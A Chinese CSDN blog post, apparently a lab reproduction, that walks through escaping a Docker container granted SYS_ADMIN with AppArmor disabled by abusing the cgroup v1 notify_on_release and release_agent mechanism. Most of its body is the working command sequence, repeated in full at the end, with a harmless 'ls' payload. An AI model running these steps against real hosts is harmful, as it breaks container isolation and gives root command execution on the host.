SYS_ADMIN配置下的容器逃逸复现--cgroup

已于 2022-02-15 16:20:34 修改
阅读量2k 收藏 5
点赞数 3
分类专栏: 云原生 文章标签: 容器 容器逃逸
于 2022-02-15 16:09:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/122945600
版权

环境:

当给容器赋予了--cap-add=SYS_ADMIN权限和--security-opt apparmor=unconfined时,可以进行rewrite_cgroup_devices(devices.allow)、ebpf、notify_on_release(挂载cgroup)等多种方式进行逃逸,这里复现以下notify_on_release方式

前提条件:SYS_ADMIN开启;缺少AppArmor;cgroup v1虚拟文件系统必须以读写方式安装在容器内部

root@VM-2-33-ubuntu:~# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:        20.04
Codename:       focal
root@VM-2-33-ubuntu:~# docker -v
Docker version 20.10.12, build e91ed57
root@VM-2-33-ubuntu:~# docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

 过程

 1 挂载宿主机cgroup,并自定义一个cgroup,这里是/tmp/cgrp/x:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

2 配置/tmp/cgrp/x的cgroup的notify_no_release和release_agent:

  设置/tmp/cgrp/x的notify_no_release属性设置为1,通过sed匹配出/etc/mtab中perdir=的路径,然后将路径+cmd写入/tmp/cgrp/release_agent

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

 3 写入自定义命令进行逃逸:

将执行的命令写入/cmd下,结果回显在当前目录的output下,执行完sh -c之后,sh进程自动退出,cgroup /tmp/cgrp/x里不再包含任何任务,/tmp/cgrp/release_agent文件里的shell将被操作系统内核执行,达到了容器逃逸的效果


echo '#!/bin/sh' > /cmd

echo "ls > $host_path/output" >> /cmd

chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

 

通过查看output可以到执行命令成功,

 这样子不明显的话我们可以开启另一个宿主机shell,在宿主机root目录下创建一下1.txt的文件

然后在容器里读取

宿主机创建文件:

 容器中执行ls /root,这里对应“ 3 写入自定义命令进行逃逸:”这一部分,发现可以看到1.txt

最后汇总一下所有命令

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

 参考:Docker SYS_ADMIN 容器逃逸原理解析 - FreeBuf网络安全行业门户

https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup

Adsatrtgo
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
node-cgroup-metrics:NodeJs模块,用于从容器内部读取cgroup指标
05-17
CGROUP-METRICS 用于读取指标的节点模块。 从/sys/fs/cgroup/读取。 内存指标: 从路径/sys/fs/cgroup/memory/memory读取: 原始值: stat.rss :匿名和交换高速缓存内存的字节数 kmem.usage_in_bytes :当前...
docker_cgroup_info:获取 docker 容器的 cgroup 信息
06-14
用于检查 docker 容器的最小工具用法 usage: docker_info.py [-h] [--cgroup_name CGROUP_NAME] [--verbose VERBOSE] [--list LIST] [--url URL]一般安装 virtualenv env. env/bin/activatepip install -r ...
容器逃逸漏洞分析 CAP_SYS_ADMIN
weixin_31610083的博客
01-16 957
主要介绍了具有CAP_SYS_ADMIN能力的容器是如何挂载并重写容器devices.allow以绕过cgroup限制并完成逃逸的过程。
Docker逃逸---授权 SYS_ADMIN Capability逃逸原理浅析
求大佬师傅带
10-14 579
Docker逃逸---授权 SYS_ADMIN Capability逃逸原理浅析
docker容器权限设置--cap-add | --cap-drop | privileged
最新发布
更多内容查看博客描述。
04-22 1064
1.privileged,权限全开,不利于宿主机安全2.cap-add/cap-drop,细粒度权限设置,需要什么开什么。
使用linux中的CAPABILITIES:SYS_ADMIN提供给容器更大的管理权限
liukuan73的专栏
10-23 6964
转载自:https://sq.163yun.com/blog/article/178222638887047168 背景 容器运行在宿主机上的时候,很多权限是被控制的,容器原理上是使用cgroup、namespace等对宿主机的资源进行隔离并且调度使用,因此对宿主机有一定的侵入性。权限控制可以一定程度上保证宿主机不被侵入。然而保证安全性的同时也会将用户在容器中的一些权限给屏蔽掉,例如默认的容器...
Docker SYS_ADMIN 权限容器逃逸
m0_63306943的博客
03-02 1081
如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。若启动docker容器时给主机一个--cap-add=SYS_ADMIN的权限,攻击者可以在容器内通过挂载宿主机cgroup,并利用cgroup notify_on_release的特性在宿主机执行shell,从而实容器逃逸。cgroup:限制资源分配的技术,限制docker的特定资源。
Docker SYS_ADMIN 容器逃逸原理解析
Jack_chao_的博客
03-27 917
如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。是对全局系统资源的一种封装隔离,使得处于不同 namespace 的进程拥有独立的全局系统资源,改变一个 namespace 中的系统资源只会影响当前 namespace 里的进程,对其他 namespace 中的进程没有影响。namespace是linux内核用来隔离内核资源的方案。
hugetlb_cgroup.rar_cgroup hugetlb
09-20
"hugetlb_cgroup.rar_cgroup hugetlb"这个标题提到了cgroups与hugetlbfs的结合,hugetlbfs是Linux内核提供的一种特殊的文件系统,用于支持大页内存(hugepages)。大页内存是一种优化内存分配的技术,它可以减少内存...
Cgroup - 从 CPU 资源隔离说起.docx
01-03
配置 Cgroup 中的 CPU 资源隔离机制需要在 /etc/cgconfig.conf 文件中进行配置。例如,我们可以在文件中添加以下内容: ``` group zorro { cpuset { cpuset.cpus = "1,2"; } } ``` 这段配置内容将 zorro 组中的...
Docker-Cgroup-Doc
07-09
sudo docker run --cap-add=NET_ADMIN --lxc-conf="lxc.cgroup.net_cls.classid = 0x00100001" -i -t ubuntu:14.04 /bin/bash 创建容器后,会创建一个虚拟网络接口: vethfaeed83 Link encap:Ethernet HWaddr 46:...
docker-suricata:使用Docker在容器内的Suricata
05-24
码头工人苏里卡塔(Docker Suricata) Suricata是一个开源IDS,IPS和NSM引擎。 有关更多信息,请访问其或查阅官方以获取技术信息。 对于高山用户:使用Docker和Docker Compose运行Suricata的4.0.4版本。 这是Suricata的即用型。 要求 主机设定 安装版本17.12.0+ 安装版本1.6.0+ 用法 初始设置 在您可以从高山发射。 默认情况下,.env文件中的OS_SURICATA设置为alpine 。 要进行选择,您必须设置OS_SURICATA环境变量或更改.env文件中的值。 可用值: 高山的 首先:使用docker-compose启动Suricata :(您必须在存储库中才能执行) docker-compose up 如果要在后台运行: docker-compose up -d Suricata
cgroup-linux内存资源管理.pdf
07-11
`cgroup`目录下的子目录和文件用于配置和监控这些限制,如`memory.limit_in_bytes`设置内存上限,`memory.usage_in_bytes`显示当前内存使用情况。 除了基本的内存限制,CGroup还支持软限制(`memory.soft_limit_in_...
Performance - cgroup介绍
10-10
cgroup 是 Linux 下的一种机制,用于将任务集(包括进程、线程及其所有未来的子级)聚合并分区到具有专门行为的层级组中。Android 使用 cgroup 控制及考量 CPU 和内存等系统资源的使用和分配情况。 cgroup 的概念是...
vas-quod:最小Linux容器运行时
03-08
这个想法是在不使用有运行时的情况下支持最小的隔离容器,vas-quod使用linux 来实隔离容器{名称空间,cgroups,chroot,unshare}。 用法 Usage: ./vas-quod - minimal container runtime [options] Options: -...
molecule-container-ubuntu:Ubuntu分子容器
03-08
ansible-lint flake8platforms : - name : instance image : " ghcr.io/hspaans/molecule-container-ubuntu:20.04 " command : " " volumes : - /sys/fs/cgroup:/sys/fs/cgroup:ro privileged : tr
红队视角下的容器逃逸利用及分析
ATpiu的博客
06-18 2050
容器逃逸/红队视角下的容器逃逸利用及分析
docker 搭建centos7
yinlell的博客
10-22 706
centos 拉取镜像 docker pull centos 创建镜像 sudo docker run --privileged \ --cap-add SYS_ADMIN \ -e container=docker \ -it --name py_centos \ -p 28000:80 -d \ --restart=always \ centos:7 /usr/sbin/init...
#if !defined(_TRACE_HOOK_CGROUP_H) || defined(TRACE_HEADER_MULTI_READ) #define _TRACE_HOOK_CGROUP_H这样写正确吗?
06-02
这段代码看起来是为了防止头文件的重包含,通常这样写是正确的。但是需要看具体情况,如果头文件中定义了某些宏或者变量,而这些宏或者变量在多个文件中都可能使用,那么这样写就不够严谨,因为多个文件可能会包含同一个头文件,造成宏或变量的重定义。在这种情况下,通常会使用 #ifndef 和 #define 进行宏定义,以确保该头文件只被包含一次。例如: ``` #ifndef _TRACE_HOOK_CGROUP_H #define _TRACE_HOOK_CGROUP_H // 头文件内容 #endif /* _TRACE_HOOK_CGROUP_H */ ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值